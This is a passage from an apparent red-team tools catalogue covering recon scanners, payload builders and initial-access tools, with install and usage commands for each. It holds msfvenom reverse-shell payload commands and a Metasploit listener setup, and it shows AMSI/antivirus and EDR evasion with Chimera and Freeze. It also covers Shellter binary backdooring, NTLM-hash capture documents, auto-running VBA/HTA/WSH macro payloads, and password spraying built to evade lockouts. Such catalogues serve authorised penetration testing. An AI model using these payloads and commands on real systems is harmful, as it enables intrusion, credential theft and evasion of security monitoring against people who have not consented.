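# Same pattern as the bookmarklet: a quoted string that starts with "/" and
# contains only URL-ish characters; the lookarounds require a quote on both sides.
ENDPOINT_RE = re.compile(r"""(?<=["'`])/[a-zA-Z0-9_?&=/\-#.]*(?=["'`])""")


def extract_paths(text):
    """Return the set of quoted paths (starting with '/') found in a blob of HTML or JS."""
    return set(ENDPOINT_RE.findall(text))


def classify(paths, base_url):
    """Separate same-origin endpoints from protocol-relative references to other hosts.

    Strings such as "//cdn.example.net/lib.js" also match the regex, but they point
    at external resources rather than endpoints on the target, so they are reported
    separately. Everything else is resolved to an absolute URL against the page URL.
    """
    base_host = urlsplit(base_url).netloc
    endpoints, external = set(), set()
    for path in paths:
        if path.startswith("//"):
            host = urlsplit("https:" + path).netloc
            if host and host != base_host:
                external.add(path)
                continue
        endpoints.add(urljoin(base_url, path))
    return endpoints, external


def harvest(base_url, page_html, script_bodies):
    """Mirror the bookmarklet: scan the page markup plus each external script body."""
    found = extract_paths(page_html)
    for body in script_bodies:
        found |= extract_paths(body)
    return classify(found, base_url)


# Constructed sample input (hypothetical host and script; not taken from any real site).
BASE_URL = "https://app.example.com/portal/"
PAGE_HTML = """<html><body>
<a href="/api/v1/users?page=1">users</a>
<form action='/login' method="post"></form>
<script src="//cdn.example.net/lib.js"></script>
</body></html>"""
SCRIPT_BODIES = [
    "fetch(`/api/v1/session`).then(r => r.json()); const report = '/admin/export.csv';",
]

if __name__ == "__main__":
    endpoints, external = harvest(BASE_URL, PAGE_HTML, SCRIPT_BODIES)
    for url in sorted(endpoints):
        print("endpoint", url)
    for ref in sorted(external):
        print("external", ref)
```

Run against saved page source and script files instead of the constructed strings to get the same list the bookmarklet prints, with the external CDN references kept out of the endpoint list.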
\n\n![image](https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png)\n\n### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)\n\nFast vulnerability scanner that uses .yaml templates to search for specific issues.\n\n**Install:** \n\n```bash\ngo install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\n```\n\n**Usage:** \n\n```bash\ncat domains.txt | nuclei -t /PATH/nuclei-templates/\n```\n\n![image](https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png)\n\n### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)\n\ncertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\n\nYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\n\n**Install:** \n\n```bash\ngit clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 certSniff.py -f example.txt\n```\n\n![image](https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png)\n\n### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)\n\nNice tool for brute forcing file/folder paths on a victim website.\n\n**Install:** \n\n```bash\nsudo apt install gobuster\n```\n\n**Usage:** \n\n```bash\ngobuster dir -u \"https://google.com\" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png)\n\n### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)\n\nA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access 
resources that are not referenced by the web application, but are still accessible by an attacker.\n\nFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\n\n**Install: (Kali)** \n\n```bash\nsudo apt update \u0026\u0026 sudo apt install -y feroxbuster\n```\n\n**Install: (Mac)** \n\n```bash\ncurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash\n```\n\n**Install: (Windows)** \n\n```powershell\nInvoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\n```\n\nFor full installation instructions see [here](https://epi052.github.io/feroxbuster-docs/docs/installation/).\n\n**Usage:** \n\n```bash\n# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n./feroxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read URLs from stdin\ncat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n```\n\nFull usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\n\n![image](https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png)\n\n*Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*\n\n### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)\n\nA tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, 
Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\n\nFeatures:\n\n- Cloud detection (IPINFO API and Source Code)\n- Fast (concurrent)\n- Cross Platform (windows, linux, mac)\n- User-Agent Randomization\n- Proxy Randomization (HTTP, Socks5)\n\n**Install:** \n\nDownload the latest [release](https://github.com/0xsha/CloudBrute/releases) for your system and follow the usage.\n\n**Usage:** \n\n```bash\n# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \"./data/storage_small.txt\"\n\n# Restrict to a single provider (amazon) and write results to a file\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w \"./data/storage_small.txt\" -c amazon -o target_output.txt\n```\n\n![image](https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png)\n\n*Image used from https://github.com/0xsha/CloudBrute*\n\n### [🔙](#tool-list)[dnsrecon](https://www.kali.org/tools/dnsrecon/#dnsrecon)\n\ndnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\n\n**Install:** \n\n```bash\nsudo apt install dnsrecon\n```\n\n**Usage:** \n\n```bash\ndnsrecon -d google.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png)\n\n### [🔙](#tool-list)[shodan.io](https://www.shodan.io/dashboard)\n\nShodan crawls public infrastructure and displays it in a searchable format. 
Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.\n\n![image](https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png)\n\n### [🔙](#tool-list)[AORT](https://github.com/D3Ext/AORT)\n\nTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\n\n**Install:** \n\n```bash\ngit clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 AORT.py -d google.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png)\n\n### [🔙](#tool-list)[spoofcheck](https://github.com/BishopFox/spoofcheck)\n\nA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.\n\nDomains are spoofable if any of the following conditions are met:\n\n- Lack of an SPF or DMARC record\n- SPF record never specifies `~all` or `-all`\n- DMARC policy is set to `p=none` or is nonexistent\n\n**Install:**\n\n```bash\ngit clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n./spoofcheck.py [DOMAIN]\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png)\n\n### [🔙](#tool-list)[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)\n\nAWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. 
It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\n\n**Install:**\n\n```\ngit clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```\nusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n  -h, --help    show this help message and exit\n  -D            Download files. This requires significant diskspace\n  -d            If set to 1 or True, create directories for each host w/ results\n  -t THREADS    number of threads\n  -l HOSTLIST\n  -g GREPWORDS  Provide a wordlist to grep for\n  -m MAXSIZE    Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n```\n\n### [🔙](#tool-list)[GitHarvester](https://github.com/metac0rtex/GitHarvester)\n\nNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.\n\n**Install:**\n\n```\ngit clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\n```\n\n**Usage:** \n\n```\n./githarvester.py\n```\n\n### [🔙](#tool-list)[truffleHog](https://github.com/dxa4481/truffleHog)\n\nTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. 
With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\n\n**Install (Binaries):** [Link](https://github.com/trufflesecurity/trufflehog/releases)\n\n**Install (Go):**\n\n```\ngit clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\n```\n\n**Usage:** \n\n```\ntrufflehog https://github.com/trufflesecurity/test_keys\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png)\n\n### [🔙](#tool-list)[Dismap](https://github.com/zhzyker/dismap)\n\nDismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.\n\nDismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\n\n**Install:** \n\nDismap is a binary file for Linux, MacOS, and Windows. 
Go to [Release](https://github.com/zhzyker/dismap/releases) to download the corresponding version to run:\n\n```bash\n# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\n```\n\n**Usage:** \n\n```bash\n# Scan 192.168.1.1 subnet\n./dismap -i 192.168.1.1/24\n\n# Scan, output to result.txt and json output to result.json\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\n./dismap -i 192.168.1.1/24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n./dismap -i 192.168.1.1/24 -t 1000\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png)\n\n*Image used from https://github.com/zhzyker/dismap*\n\n### [🔙](#tool-list)[enum4linux](https://github.com/CiscoCXSecurity/enum4linux)\n\nA tool for enumerating information from Windows and Samba systems.\n\nIt can be used to gather a wide range of information, including:\n\n- Domain and domain controller information\n- Local user and group information\n- Shares and share permissions\n- Security policies\n- Active Directory information\n\n**Install: (Apt)** \n\n```bash\nsudo apt install enum4linux\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/CiscoCXSecurity/enum4linux\ncd enum4linux\n```\n\n**Usage:** \n\n```bash\n# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\n```\n\nFull usage information can be found in this 
[blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png)

*Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Dangerously fast DNS/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc) and written in Rust.

You will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**Install:**

Download the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases).

```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
```

**Usage:**

```bash
skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt
```

![image](https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png)

*Image used from https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor is an intelligence tool whose goal is to perform OSINT tasks and more, without requiring any API key.

**Main Features:**

- Searching for information about IP addresses, ASNs and organizations.
- Wrapper for running rustscan, masscan and nmap more efficiently on IP/CIDR ranges.
- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc.).
- Get a summary of an IP address (powered by [@thebl4ckturtle](https://github.com/theblackturtle))

**Install:**

```bash
go install github.com/j3ssie/metabigor@latest
```

**Usage:**

```bash
# Discover the IP ranges of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt

# Get more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is an old command

# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt

# Reverse whois to find related domains
echo 'example.com' | metabigor related -s 'whois'

# Get the Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'
```

![image](https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png)

*Image used from https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob is a tool to help find potentially sensitive files pushed to public repositories on GitHub.

Gitrob will clone repositories belonging to a user or organization down to a configurable depth, iterate through the commit history and flag files that match signatures for potentially sensitive files.

The findings will be presented through a web interface for easy browsing and analysis.

**Note:** *Gitrob will need a GitHub access token in order to interact with the GitHub API.
[Create a personal access token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) and save it in an environment variable in your .bashrc or similar shell configuration file:*

```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
```

**Install: (Go)**

```bash
go get github.com/michenriksen/gitrob
```

**Install: (Binary)**

A [precompiled version](https://github.com/michenriksen/gitrob/releases) is available for each release.

**Usage:**

```bash
# Run against an org
gitrob {org_name}

# Save the session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Load a session from a file
gitrob -load ~/gitrob-session.json
```

![image](https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png)

*Image used from https://www.uedbox.com/post/58828/*

### [🔙](#tool-list)[gowitness](https://github.com/sensepost/gowitness)

Gowitness is a website screenshot utility written in Golang. It uses headless Chrome to generate screenshots of web interfaces from the command line, with a handy report viewer to process results.
Both Linux and macOS are supported, with Windows support mostly working.

**Install: (Go)**

```bash
go install github.com/sensepost/gowitness@latest
```

Full installation information can be found [here](https://github.com/sensepost/gowitness/wiki/Installation).

**Usage:**

```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a CIDR range using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open HTTP services from an nmap XML file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve
```

Full usage information can be found [here](https://github.com/sensepost/gowitness/wiki/Usage).

![image](https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png)

*Image used from https://github.com/sensepost/gowitness*

Resource Development
====================

### [🔙](#tool-list)[remoteInjector](https://github.com/JohnWoodman/remoteinjector)

Injects a link to a remote Word template into a Word document.

This Python-based utility modifies a .docx file's settings.xml.rels so that it links to a remotely hosted .dotm template containing a VBA macro, which executes when the document is opened and macros are enabled.

[Related Blog Post](https://john-woodman.com/research/vba-macro-remote-template-injection/)

**Install:**

```bash
git clone https://github.com/JohnWoodman/remoteinjector; cd remoteinjector
```

**Usage:**

```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx
```

### [🔙](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera)

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions.
It digests malicious PS1 files known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

**Install:**

```bash
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
```

**Usage:**

```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
```

![image](https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png)

### [🔙](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)

Msfvenom allows the creation of payloads for various operating systems in a wide range of formats.
It also supports obfuscation of payloads for AV bypass.

**Set Up Listener**

```shell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
```

#### Msfvenom Commands

**PHP:**

```bash
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=1234 R
```

**Windows:**

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
```

**Linux:**

```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
```

**Java:**

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
```

**HTA:**

```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
```

![image](https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png)

### [🔙](#tool-list)[Shellter](https://www.shellterproject.com/)

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

It can be used to inject shellcode into native Windows applications (currently 32-bit applications only).

Shellter takes advantage of the original structure of the PE file and doesn't apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, or anything else that would look dodgy under an AV scan.

Full README information can be found [here](https://www.shellterproject.com/Downloads/Shellter/Readme.txt).

**Install: (Kali)**

```bash
apt-get update
apt-get install shellter
```

**Install: (Windows)**

Visit the [download page](https://www.shellterproject.com/download/) and install.

**Usage:**

Just pick a legitimate binary to backdoor and run Shellter.

Some nice tips can be found
[here](https://www.shellterproject.com/tipstricks/).

Lots of community usage demos can be found [here](https://www.shellterproject.com/shellter-community-demos/).

![image](https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png)

*Image used from https://www.kali.org/tools/shellter/images/shellter.png*

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.

Freeze utilizes multiple techniques to not only remove userland EDR hooks, but also to execute shellcode in such a way that it circumvents other endpoint monitoring controls.

**Install:**

```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
```

**Usage:**

```
  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)
```

![image](https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png)

*Image used from https://www.blackhatethicalhacking.com/tools/freeze/*

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

This script will create a Microsoft Word document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.

Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.

**Install:**

```bash
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
```

**Usage:**

```bash
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1

# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0
```

![image](https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png)

*Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*

### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/)

This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.
It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.

When developing exploits, understanding the internals of the target system is crucial. This site can help with exploit development by documenting the low-level, undocumented aspects of Windows.

**Usage:**

Visit [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/41b424f3-053c-440b-b0fd-235e95980d9a)

*Image used from http://undocumented.ntinternals.net/*

### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html)

This technical note provides a comprehensive list of all the APIs exported by the Windows kernel that driver writers can use to register callback routines, which are invoked by kernel components under various circumstances.

Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.
The undocumented functions are described briefly, whereas the documented ones are just listed here for reference.

**Usage:**

Visit [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/b7532b7d-1abc-4af6-be92-f6f78d24a788)

*Image used from https://codemachine.com*

### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)

A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via Office macros.

**Usage:**

Visit [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/7f7ad942-48d7-42e7-a3cc-55ec84139058)

*Image used from https://github.com/S3cur3Th1sSh1t*

### [🔙](#tool-list)WSH

**Creating payload:**

```vbs
' Launch calc.exe, passing this script's full path as its argument (window hidden, wait for exit)
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True
```

**Execute:**

```bash
wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt  # If .vbs files are blacklisted
```

### [🔙](#tool-list)HTA

**Creating payload:**

```html
<html>
<body>
<script>
	// HTA runs with the privileges of the local user; launch cmd.exe via the WScript.Shell COM object
	var c = 'cmd.exe';
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
```

**Execute:** Run the file

### [🔙](#tool-list)VBA

**Creating payload:**

```vba
Sub calc()
	Dim payload As String
	payload = "calc.exe"
	' Run the payload with a hidden window
	CreateObject("Wscript.Shell").Run payload, 0
End Sub
```

**Execute:** Set the function to Auto_Open() in a macro-enabled document

Initial Access
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

Launch a password spray /
brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.

CredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.

Features:
- Fully supports all AWS Regions
- Automatically generates APIs for proxy pass-through
- Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers
- Multi-threaded processing
- Password delay counters & configuration for lockout policy evasion
- Easily add new plugins
- Fully anonymous

**Install:**

```bash
git clone https://github.com/knavesec/CredMaster; cd CredMaster; pip install -r requirements.txt
```

For full installation instructions see [here](https://whynotsecurity.com/blog/credmaster/#setup).

**Usage:**

```bash
python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}
python3 credmaster.py --config config.json
```

This tool requires AWS API access keys; a walkthrough on how to acquire these keys can be found here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://github.com/user-attachments/assets/f678cca4-7a53-41e7-9323-51e8efd0e6ba)

*Image used from https://github.com/knavesec/CredMaster/wiki*

### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!

**Install:**

```bash
pip install git+https://github.com/blacklanternsecurity/TREVORspray
```

**Usage:**

```bash
# Recon
python3 ./trevorspray --recon evilcorp.com

# Enumerate users via OneDrive
python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

# Spray against discovered users
python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token
```

For full usage instructions see [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://github.com/user-attachments/assets/67c64f6d-527a-4b59-8dd9-b73bc68274f4)

*Image used from https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

Toolkit demonstrating another approach to a QRLJacking attack, allowing remote account takeover through sign-in QR code phishing.

It consists of a browser extension, used by the attacker to extract the sign-in QR code, and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.

Demo [video](https://www.youtube.com/watch?v=8pfodWzqMcU)

**Install: (Extension)**

You can load the extension in Chrome through the `Load unpacked` feature:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.

**Install: (Server)**

```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat
```

**Usage:**

1. Run the server by running the built server binary: `./server/build/evilqr-server`
2. Open any of the supported websites in your Chrome browser, with the **Evil QR** extension installed:
```
https://discord.com/login
https://web.telegram.org/k/
https://whatsapp.com
https://store.steampowered.com/login/
https://accounts.binance.com/en/login
https://www.tiktok.com/login
```
3. Make sure the sign-in QR code is visible and click the **Evil QR** extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.
4. Open the server's phishing page URL: `http://127.0.0.1:35000` (default)

![evilqr](https://github.com/user-attachments/assets/00ad78c5-1978-4e59-a522-7e8b9c39b1c3)

*Image used from https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

The most common form of authentication is the combination of a username and a password or passphrase. Passwords can sometimes be guessed by profiling the user: a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

That is why CUPP was born.

**Install:**

```bash
git clone https://github.com/Mebus/cupp;cd cupp
```

**Usage:**

```bash
# Run in interactive mode
python3 ./cupp.py -i
```

![cupp](https://github.com/user-attachments/assets/39ad1c58-de4e-449a-b2d4-a9629d5ab82c)

*Image used from https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

[hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 Documentation](https://docs.hak5.org/bash-bunny/)

[Nice Payload Repo](https://github.com/hak5/bashbunny-payloads)

[Product Page](https://hak5.org/products/bash-bunny)

![image](https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png)

